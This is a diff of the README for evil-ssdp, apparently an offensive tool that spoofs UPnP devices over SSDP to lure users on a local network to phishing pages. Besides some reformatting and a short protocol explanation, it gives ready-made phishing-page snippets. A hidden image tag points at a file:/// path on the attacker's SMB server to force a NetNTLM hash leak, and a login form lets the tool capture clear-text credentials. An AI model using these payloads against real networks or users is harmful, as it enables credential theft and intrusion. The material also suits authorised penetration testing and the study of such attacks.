initstring/evil-ssdp/README.md

 In your phishing page (`present.html`), use variables like the following for additional functionality:

 ```
-# The following line will initiate a NetNTLM challenge/response using the IP address of either the interface you provide or an optionally specified IP address:
+# The following line will initiate a NetNTLM challenge/response using the IP address of either the interface
+# you provide or an optionally specified IP address:
 <img src="file://///$smbServer/smb/hash.jpg" style="display: none;" />

-# The following line will leverage an optionally specified URL redirection.
-This is handy for when used with optional basic authentication to then redirect to a valid site.
-This line is built in to the microsoft-azure template
+# The following line will leverage optionally specified URL redirection.
+This is handy for when used with
+# basic authentication to redirect to a valid site.
+This line is built in to the microsoft-azure template:
 <img src="file://///$smbServer/smb/hash.jpg" style="display: none;" />

 # If using an HTTP form to capture clear-text credentials, use code like the following.
-The tool will monitor POSTs to this URL for credentials:
+The tool will monitor
+# POSTs to this URL for credentials:
 <form method="POST" action="/ssdp/do_login.html" name="LoginForm" autocomplete="off">
 ```

+The tool currently only correctly creates devices for the UPNP 'rootdevice' device type, although it is responding to the SSDP queries for all devices types.
+If you know UPNP well, you can create a new template with the correct parameters to fufill requests for other device types as well.
+There is still a lot to explore here with exploiting specific applications and the way they expect and leverage UPNP devices.

 # Technical Details
 Simple Service Discovery Protocol (SSDP) is used by Operating Systems (Windows, MacOS, Linux, IOS, Android, etc) and applications (Spotify, Youtube, etc) to discover shared devices on a local network.
 It is the foundation for discovering and advertising Universal Plug & Play (UPNP) devices.